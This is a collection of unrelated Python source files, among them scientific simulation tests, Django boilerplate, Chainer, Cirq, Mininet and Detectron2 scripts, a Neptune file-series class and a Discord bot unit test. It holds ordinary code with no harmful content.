CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return False, kml_path
if current_kml_hash == markdown_kml_hash:
logger.debug('kml_hash = %s', current_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return True, kml_path
return False, ''
def write_report():
if CURRENT_REPORT is not None:
with CURRENT_REPORT:
CURRENT_REPORT.write_header()
CURRENT_REPORT.write_settings(**vars(FLAGS))
CURRENT_REPORT.write_kml_section()
CURRENT_REPORT.write_files_verified()
CURRENT_REPORT.write_unverified_topics(ILLEGAL_TOPICS)
CURRENT_REPORT.write_bad_topics()
def main():
global CURRENT_REPORT # pylint: disable=global-statement
argv = [sys.argv[0]] + parse_args(sys.argv[1:])
logger = get_logger()
logger.debug('FLAGS=%s', FLAGS)
logger.debug('argv=%s', argv)
logger.info('Unable to verify the following topics:\n%s', pprint.pformat(
ILLEGAL_TOPICS))
logger.info('Topics requiring special handling:\n%s', pprint.pformat(
SPECIAL_TOPICS))
directories = map(os.path.expanduser, FLAGS.directories)
for directory in directories:
if os.path.isdir(directory):
logger.info('Processing directory "%s"', directory)
CURRENT_REPORT = VerificationReport(directory)
kml_paths = get_kml_paths(directory)
if not kml_paths:
print('Unable to verify "{}". No kml found.'.format(directory))
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = False
write_report()
continue
markdown_paths = get_markdown_paths(directory)
if not markdown_paths:
                print('Unable to verify "{}". No markdown ' \
                      'to compare kml hash against.'.format(directory))
                # fall back to the first candidate kml so verification can continue
                kml_path = kml_paths[0]
else:
hash_verified, kml_path = verify_kml_hash(
kml_paths, markdown_paths)
if CURRENT_REPORT is not None:
CURRENT_REPORT.matching_hashes = hash_verified
if not hash_verified:
print('Unable to verify {}. KML and markdown ' \
'hashes do not match.'.format(directory))
tbc = TopicBagChecker(kml_path)
files_list = util.get_sorted_files_list(directory) # pylint: disable=no-member
if CURRENT_REPORT is not None:
CURRENT_REPORT.files_list = files_list
verify_files_in_directory(files_list, tbc)
else:
logger.info('"%s" is not a directory.', directory)
write_report()
if __name__ == '__main__':
main()
|
""" Test utilities for testing
:Author: Arthur Goldberg <Arthur.Goldberg@mssm.edu>
:Date: 2019-10-31
:Copyright: 2019, Karr Lab
:License: MIT
"""
from scipy.constants import Avogadro
import os
import shutil
import tempfile
import unittest
from de_sim.simulation_config import SimulationConfig
from wc_sim.multialgorithm_simulation import MultialgorithmSimulation
from wc_sim.sim_config import WCSimulationConfig
from wc_sim.simulation import Simulation
from wc_sim.testing.make_models import MakeModel
from wc_sim.testing.utils import (check_simul_results, plot_expected_vs_simulated, get_expected_dependencies,
create_run_directory)
class TestTestingUtils(unittest.TestCase):
def setUp(self):
self.tmp_dir = tempfile.mkdtemp()
self.results_dir = tempfile.mkdtemp(dir=self.tmp_dir)
self.args = dict(results_dir=tempfile.mkdtemp(dir=self.tmp_dir),
checkpoint_period=1)
de_simulation_config = SimulationConfig(max_time=10, output_dir=tempfile.mkdtemp(dir=self.tmp_dir))
self.wc_sim_config = WCSimulationConfig(de_simulation_config, checkpoint_period=1)
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_check_simul_results(self):
init_volume = 1E-16
init_density = 1000
molecular_weight = 100.
default_species_copy_number = 10_000
init_accounted_mass = molecular_weight * default_species_copy_number / Avogadro
init_accounted_density = init_accounted_mass / init_volume
expected_initial_values_compt_1 = dict(
init_volume=init_volume,
init_accounted_mass=init_accounted_mass,
            init_mass=init_volume * init_density,
            init_density=init_density,
            init_accounted_density=init_accounted_density,
            accounted_fraction=init_accounted_density / init_density
)
expected_initial_values = {'compt_1': expected_initial_values_compt_1}
model = MakeModel.make_test_model('1 species, 1 reaction',
init_vols=[expected_initial_values_compt_1['init_volume']],
init_vol_stds=[0],
density=init_density,
molecular_weight=molecular_weight,
default_species_copy_number=default_species_copy_number,
default_species_std=0,
submodel_framework='WC:deterministic_simulation_algorithm')
multialgorithm_simulation = MultialgorithmSimulation(model, self.wc_sim_config)
_, dynamic_model = multialgorithm_simulation.build_simulation()
check_simul_results(self, dynamic_model, None, expected_initial_values=expected_initial_values)
# test dynamics
simulation = Simulation(model)
results_dir = simulation.run(max_time=2, **self.args).results_dir
nan = float('NaN')
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]},
rel_tol=1E-5)
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 9.999e-14, 9.998e-14]}})
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[nan, nan, nan]}})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}},
rel_tol=0)
plots_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'results'))
os.makedirs(plots_dir, exist_ok=True)
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]},
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]},
expected_property_trajectories=\
{'compt_1':
{'mass':[nan, nan, nan]}})
def test_expected_dependencies(self):
eds = get_expected_dependencies()
self.assertEqual(eds['DynamicStopCondition']['reaction_9'], {'stop_condition_7'})
self.assertEqual(eds['DynamicStopCondition']['reaction_10'], set())
def test_create_run_directory(self):
def run_dir_test(self, run_dir):
self.assertTrue(os.path.isdir(run_dir))
os.rmdir(run_dir)
# rm the date dir if it's empty
try:
date_dir = os.path.abspath(os.path.join(run_dir, ".."))
os.rmdir(date_dir)
except OSError:
pass
run_dir_test(self, create_run_directory())
run_dir_test(self, create_run_directory(base_dir='/tmp/runs', in_repo=False))
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'WatchInSGE.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
import numpy
from chainer.backends import cuda
from chainer import configuration
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
class Zoneout(function_node.FunctionNode):
"""Zoneout regularization."""
def __init__(self, zoneout_ratio):
self.zoneout_ratio = zoneout_ratio
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
def forward(self, inputs):
self.retain_inputs(())
h, x = inputs
xp = cuda.get_array_module(*x)
if xp is numpy:
flag_x = xp.random.rand(*x.shape) >= self.zoneout_ratio
else:
flag_x = (xp.random.rand(*x.shape) >=
self.zoneout_ratio)
        # flag_x marks elements that take the new value x; the complementary
        # mask flag_h marks the "zoned out" elements that keep the previous h.
        self.flag_h = xp.ones_like(flag_x) ^ flag_x
        self.flag_x = flag_x
        return h * self.flag_h + x * self.flag_x,
def backward(self, indexes, grad_outputs):
gy, = grad_outputs
ret = []
if 0 in indexes:
ret.append(gy * self.flag_h)
if 1 in indexes:
ret.append(gy * self.flag_x)
return ret
def zoneout(h, x, ratio=.5, **kwargs):
"""zoneout(h, x, ratio=.5)
    Drops elements of the input variable and replaces them with the previous
    variable at random.
    This function drops input elements randomly with probability ``ratio`` and
    sets the dropped elements to their previous values instead. In testing mode,
    it does nothing and just returns ``x``.
.. warning::
``train`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('train', train)``.
See :func:`chainer.using_config`.
Args:
h (~chainer.Variable): Previous variable.
x (~chainer.Variable): Input variable.
ratio (float): Zoneout ratio.
Returns:
~chainer.Variable: Output variable.
See the paper: `Zoneout: Regularizing RNNs by Randomly Preserving Hidden \
Activations <https://arxiv.org/abs/1606.01305>`_.
"""
if kwargs:
argument.check_unexpected_kwargs(
kwargs, train='train argument is not supported anymore. '
'Use chainer.using_config')
argument.assert_kwargs_empty(kwargs)
if configuration.config.train:
return Zoneout(ratio).apply((h, x))[0]
return x
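# --- Illustrative usage (not part of the original module) ---
# A minimal sketch of the call signature documented above; the array shapes and
# the 0.5 ratio are arbitrary assumptions. During training a random mix of the
# previous state h and the new state x is returned; in test mode the function
# simply returns x.
if __name__ == '__main__':
    import chainer
    _h = numpy.random.rand(2, 3).astype(numpy.float32)  # previous hidden state
    _x = numpy.random.rand(2, 3).astype(numpy.float32)  # candidate new state
    with chainer.using_config('train', True):
        _y_train = zoneout(_h, _x, ratio=0.5)  # stochastic mix of _h and _x
    with chainer.using_config('train', False):
        _y_test = zoneout(_h, _x, ratio=0.5)   # returns _x unchanged
    print(_y_train.shape, _y_test.shape)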
|
#!/usr/bin/env python
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
# basic
name='tool-registry-client',
version='0.1.0',
# packages=setuptools.find_packages(exclude=["tests", "tests.*"]),
# py_modules=['hello'],
# scripts=['bin/nlp-evaluate'],
packages=setuptools.find_packages(),
entry_points={
# 'console_scripts': ['rocc-cli=roccclient.cli.__main__:main']
},
# requirements
    python_requires='>=3.6',
install_requires=[
'click>=7.1.2',
'jsonschema>=3.2.0',
'synapseclient>=2.2.0'
],
# metadata to display on PyPI
description='Tool Registry Library for Python',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Sage-Bionetworks/tool-registry-client',
author='The Tool Registry Team',
author_email='thomas.schaffter@sagebionetworks.org',
license='Apache',
project_urls={
"Source Code": "https://github.com/Sage-Bionetworks/tool-registry-client", # noqa: E501
"Bug Tracker": "https://github.com/Sage-Bionetworks/tool-registry-client/issues", # noqa: E501
},
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Topic :: Software Development :: Libraries',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Bio-Informatics'
]
)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-04-20 18:17
from __future__ import unicode_literals
from django.db import migrations
import mep.accounts.partial_date
class Migration(migrations.Migration):
dependencies = [
('accounts', '0018_merge_20180418_1607'),
]
operations = [
migrations.AlterField(
model_name='borrow',
name='end_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
migrations.AlterField(
model_name='borrow',
name='start_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
]
|
from unittest.mock import patch
from m.ci.config import Config, GitFlowConfig, MFlowConfig, Workflow
from m.ci.git_env import GitEnv, get_git_env
from m.core import issue
from m.core.fp import Good
from m.core.io import EnvVars
from ..util import FpTestCase
class GitEnvTest(FpTestCase):
config = Config(
owner='jmlopez-rod',
repo='m',
version='0.0.0',
m_dir='m',
workflow=Workflow.FREE_FLOW,
git_flow=GitFlowConfig(),
m_flow=MFlowConfig(),
)
env_vars = EnvVars(
ci_env=True,
github_token='super_secret_like_damn',
server_url='abc.xyz',
run_id='404',
run_number='1',
run_url='http://abc.xyz/404',
git_branch='refs/heads/master',
git_sha='git-sha-abc-123',
)
def test_local(self):
self.env_vars.ci_env = False
result = get_git_env(self.config, self.env_vars)
self.assert_ok(result)
self.assertDictEqual(
result.value.__dict__,
GitEnv(
sha='git-sha-abc-123',
branch='master',
target_branch='master',
).__dict__,
)
def test_read_git_env_fail(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.return_value = issue('made up issue')
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertIsNotNone(err.cause)
self.assertEqual(err.cause.message, 'made up issue')
def test_bad_github_response(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [Good({}), Good({})]
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertEqual(
err.cause.message,
'`repository` path was not found',
)
def test_pass(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [
Good(
dict(
repository=dict(
commit=dict(
message='Merge sha1 into sha2',
),
),
),
),
Good(
dict(
repository=dict(
commit=dict(
oid='123456789',
message='commit message',
),
),
),
),
]
result = get_git_env(self.config, self.env_vars)
self.assertFalse(result.is_bad)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=37
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=9
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=34
c.append(cirq.Z.on(input_qubit[3])) # number=35
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=36
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.H.on(input_qubit[0])) # number=5
c.append(cirq.H.on(input_qubit[1])) # number=6
c.append(cirq.H.on(input_qubit[2])) # number=7
c.append(cirq.H.on(input_qubit[3])) # number=8
c.append(cirq.H.on(input_qubit[3])) # number=31
c.append(cirq.CZ.on(input_qubit[0],input_qubit[3])) # number=32
c.append(cirq.H.on(input_qubit[3])) # number=33
c.append(cirq.X.on(input_qubit[3])) # number=27
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[3])) # number=28
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[0])) # number=14
c.append(cirq.H.on(input_qubit[1])) # number=30
c.append(cirq.CZ.on(input_qubit[2],input_qubit[0])) # number=15
c.append(cirq.H.on(input_qubit[0])) # number=16
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=20
c.append(cirq.X.on(input_qubit[2])) # number=21
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=22
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=17
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=23
c.append(cirq.X.on(input_qubit[2])) # number=24
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=25
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=19
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq2117.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
|
# -*- coding: utf-8 -*-
"""Region office topology.
Office has two floors
            terminate_switch
             /            \
    switch-1-floor     switch-2-floor
         |               |        \
       hosts           hosts    switchF2
                                    |
                                  hosts
Hosts consist of PCs+Phones, ATMs or Security devices (cameras, etc)
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.node import RemoteController, OVSSwitch
from functools import partial
class MyTopo( Topo ):
"Simple topology example."
def __init__( self, hosts_per_sw, hnum, tnum):
"Create custom topo."
# Initialize topology
Topo.__init__( self )
# Add hosts and switches
ts1 = self.addSwitch( 's1', dpid='%x' % 41)
s_fl1 = self.addSwitch( 's_fl1', dpid='%x' % 42)
s_fl2 = self.addSwitch( 's_fl2', dpid='%x' % 43)
s_f2_2 = self.addSwitch( 's_f2_2', dpid='%x' % 44)
self.addLink( ts1, s_fl1, 2, 1 )
self.addLink( ts1, s_fl2, 3, 1 )
self.addLink( s_fl2, s_f2_2, 2, 1 )
sec1 = self.addHost( 'sec1', ip='172.16.28.2/27')
sec2 = self.addHost( 'sec2', ip='172.16.28.3/27')
self.addLink( sec1, s_fl1, 0, 2 )
self.addLink( sec2, s_fl2, 0, 3 )
atm1 = self.addHost( 'atm1', ip='172.16.26.18/28')
atm2 = self.addHost( 'atm2', ip='172.16.26.19/28')
atm3 = self.addHost( 'atm3', ip='172.16.26.20/28')
self.addLink( atm2, s_f2_2, 0, 2 )
self.addLink( atm3, s_f2_2, 0, 3 )
self.addLink( atm1, s_fl1, 0, 3 )
pnum = 4
        # Add links: half of hosts to one switch, half to another
for i in range(hosts_per_sw):
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl1, 0, pnum )
self.addLink( t, s_fl1, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl2, 0, pnum )
self.addLink( t, s_fl2, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_f2_2, 0, pnum )
self.addLink( t, s_f2_2, 0, pnum+1 )
hnum+=1
tnum+=1
pnum += 2
def runMinimalTopo():
CONTROLLER_IP = '192.168.2.4'
num = 4
hnum = 130
tnum = 194
topo = MyTopo(num, hnum, tnum) # Create an instance of our topology
net = Mininet(topo = topo,
controller=lambda name: RemoteController( name, ip=CONTROLLER_IP),
switch=partial(OVSSwitch, protocols='OpenFlow13'),
autoSetMacs=True )
net.start()
for i in range(num):
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('sec1').cmd('ip route add default via 172.16.28.33')
net.get('sec2').cmd('ip route add default via 172.16.28.33')
net.get('atm1').cmd('ip route add default via 172.16.26.17')
net.get('atm2').cmd('ip route add default via 172.16.26.17')
net.get('atm3').cmd('ip route add default via 172.16.26.17')
net.get('s1').cmd('ovs-vsctl add-port s1 eth1')
cli = CLI(net)
# After the user exits the CLI, shutdown the network.
net.stop()
if __name__ == '__main__':
# This runs if this file is executed directly
setLogLevel( 'info' )
runMinimalTopo()
topos = { 'mytopo': MyTopo }
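# Usage note (an assumption based on common Mininet conventions, not taken from
# the original file): the ``topos`` dict above lets the ``mn`` launcher build
# this topology directly, passing MyTopo's constructor arguments after the
# topology name, e.g.
#   sudo mn --custom <this_file>.py --topo mytopo,4,130,194 \
#       --controller=remote,ip=192.168.2.4 --switch ovsk,protocols=OpenFlow13
# Running the script directly (``sudo python <this_file>.py``) instead calls
# runMinimalTopo() as defined above.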
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import argparse
import glob
import multiprocessing as mp
import os
import time
import cv2
import tqdm
import numpy as np
from detectron2.config import get_cfg
from detectron2.data.detection_utils import read_image
from detectron2.utils.logger import setup_logger
from predictor import VisualizationDemo
# constants
WINDOW_NAME = "COCO detections"
def setup_cfg(args):
# load config from file and command-line arguments
cfg = get_cfg()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
# Set model
cfg.MODEL.WEIGHTS = args.weights
# Set score_threshold for builtin models
cfg.MODEL.RETINANET.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = args.confidence_threshold
cfg.freeze()
return cfg
def get_parser():
parser = argparse.ArgumentParser(description="Detectron2 Demo")
parser.add_argument(
"--config-file",
default="./configs/ocr/icdar2013_101_FPN.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--weights",
default="./out_dir_r101/icdar2013_model/model_ic13_r101.pth",
metavar="pth",
help="the model used to inference",
)
parser.add_argument(
"--input",
default="./input_images/*.jpg",
nargs="+",
help="the folder of icdar2013 test images"
)
parser.add_argument(
"--output",
default="./test_icdar2013/",
help="A file or directory to save output visualizations. "
"If not given, will show output in an OpenCV window.",
)
parser.add_argument(
"--confidence-threshold",
type=float,
default=0.7,
help="Minimum score for instance predictions to be shown",
)
parser.add_argument(
"--opts",
help="Modify config options using the command-line 'KEY VALUE' pairs",
default=[],
nargs=argparse.REMAINDER,
)
return parser
def save_result_to_txt(txt_save_path,prediction,polygons):
file = open(txt_save_path,'w')
classes = prediction['instances'].pred_classes
boxes = prediction['instances'].pred_boxes.tensor
for i in range(len(classes)):
if classes[i]==0:
xmin = str(int(boxes[i][0]))
ymin = str(int(boxes[i][1]))
xmax = str(int(boxes[i][2]))
ymax = str(int(boxes[i][3]))
file.writelines(xmin+','+ymin+','+xmax+','+ymax+',')
file.writelines('\r\n')
file.close()
if __name__ == "__main__":
args = get_parser().parse_args()
cfg = setup_cfg(args)
detection_demo = VisualizationDemo(cfg)
test_images_path = args.input
output_path = args.output
start_time_all = time.time()
img_count = 0
for i in glob.glob(test_images_path):
print(i)
img_name = os.path.basename(i)
img_save_path = output_path + img_name.split('.')[0] + '.jpg'
img = cv2.imread(i)
start_time = time.time()
prediction, vis_output, polygons = detection_demo.run_on_image(img)
txt_save_path = output_path + 'res_img' + img_name.split('.')[0].split('img')[1] + '.txt'
save_result_to_txt(txt_save_path,prediction,polygons)
print("Time: {:.2f} s / img".format(time.time() - start_time))
vis_output.save(img_save_path)
img_count += 1
print("Average Time: {:.2f} s /img".format((time.time() - start_time_all) / img_count))
|
from typing import Generic, TypeVar, List, Optional
T = TypeVar('T')
class Stack(Generic[T]):
def __init__(self):
self.items: List[T] = []
def empty(self) -> bool:
return len(self.items) == 0
def push(self, item: T):
self.items.append(item)
def pop(self) -> T:
return self.items.pop()
def peek(self, default: Optional[T] = None) -> Optional[T]:
if len(self.items) > 0:
return self.items[-1]
return default
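# A minimal usage example (added for illustration; not part of the original module):
if __name__ == '__main__':
    s: Stack[int] = Stack()
    print(s.empty())          # True
    s.push(1)
    s.push(2)
    print(s.peek())           # 2 (top of the stack, not removed)
    print(s.pop())            # 2
    print(s.pop())            # 1
    print(s.peek(default=0))  # 0 (stack is empty, so the default is returned)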
|
"""Custom url shortener backend for testing Zinnia"""
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured('This backend only exists for testing')
def backend(entry):
"""Custom url shortener backend for testing Zinnia"""
return ''
|
#
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import imghdr
import os
import pathlib
from typing import List, Optional, Iterable
from neptune.new.internal.utils import base64_encode
from neptune.new.exceptions import FileNotFound, OperationNotSupported
from neptune.new.types import File
from neptune.new.types.series.file_series import FileSeries as FileSeriesVal
from neptune.new.internal.operation import (
ImageValue,
LogImages,
ClearImageLog,
Operation,
)
from neptune.new.attributes.series.series import Series
from neptune.utils import split_to_chunks
Val = FileSeriesVal
Data = File
class FileSeries(Series[Val, Data]):
def _get_log_operations_from_value(
self, value: Val, step: Optional[float], timestamp: float
) -> List[Operation]:
values = [
LogImages.ValueType(
ImageValue(
data=self._get_base64_image_content(val),
name=value.name,
description=value.description,
),
step=step,
ts=timestamp,
)
for val in value.values
]
return [LogImages(self._path, chunk) for chunk in split_to_chunks(values, 1)]
def _get_clear_operation(self) -> Operation:
return ClearImageLog(self._path)
def _data_to_value(self, values: Iterable, **kwargs) -> Val:
return FileSeriesVal(values, **kwargs)
def _is_value_type(self, value) -> bool:
return isinstance(value, FileSeriesVal)
@staticmethod
def _get_base64_image_content(file: File) -> str:
if file.path is not None:
if not os.path.exists(file.path):
raise FileNotFound(file.path)
with open(file.path, "rb") as image_file:
file = File.from_stream(image_file)
ext = imghdr.what("", h=file.content)
if not ext:
raise OperationNotSupported(
"FileSeries supports only image files for now. "
"Other file types will be implemented in future."
)
return base64_encode(file.content)
def download(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
for i in range(0, item_count):
self._backend.download_file_series_by_index(
self._container_id, self._container_type, self._path, i, target_dir
)
def download_last(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
if item_count > 0:
self._backend.download_file_series_by_index(
self._container_id,
self._container_type,
self._path,
item_count - 1,
target_dir,
)
else:
raise ValueError("Unable to download last file - series is empty")
def _get_destination(self, destination: Optional[str]):
target_dir = destination
if destination is None:
target_dir = os.path.join("neptune", self._path[-1])
pathlib.Path(os.path.abspath(target_dir)).mkdir(parents=True, exist_ok=True)
return target_dir
|
import unittest
from unittest.mock import patch, Mock
import discord
import datetime
from commands import ChangePrefixCommand
from serverobjects.server import DiscordServer
class TestChangePrefixCommand(unittest.TestCase):
def setUp(self):
self.command = ChangePrefixCommand()
self.time = datetime.datetime.now()
self.server_json = {
'server_id' : 1,
'awake' : True,
'timeout_duration_seconds': 1800,
'prefix': '!vt',
'banned_words': [{
'rowid': 1,
'server_id': 1,
'banned_word': 'vore',
'infracted_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'calledout_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'record': {
'record_seconds': 2400,
'infraction_count': 0
}
}]
}
def test_is_command_authorized__no_permissions_disallowed(self):
result = self.command.is_command_authorized()
self.assertFalse(result)
def test_is_command_authorized__non_admin_disallowed(self):
permissions = discord.Permissions()
result = self.command.is_command_authorized(permissions)
self.assertFalse(result)
def test_is_command_authorized__admin_allowed(self):
permissions = discord.Permissions.all()
result = self.command.is_command_authorized(permissions)
self.assertTrue(result)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_full_time_valid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix !testin",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
prefix_patch.assert_called_with({ 'prefix': '!testin' })
self.assertEqual(
retval,
"Cool, from now on you'll need to start a message with '!testin' for me to treat it as a command."
)
self.assertTrue(prefix_patch.called)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_prefix_too_long(self, prefix_patch):
prefix_patch.return_value = False
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix asdfasdfasdf",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
self.assertEqual(
retval,
"Sorry, I don't understand that formatting. I was expecting a new prefix between 1 and 10 characters long."
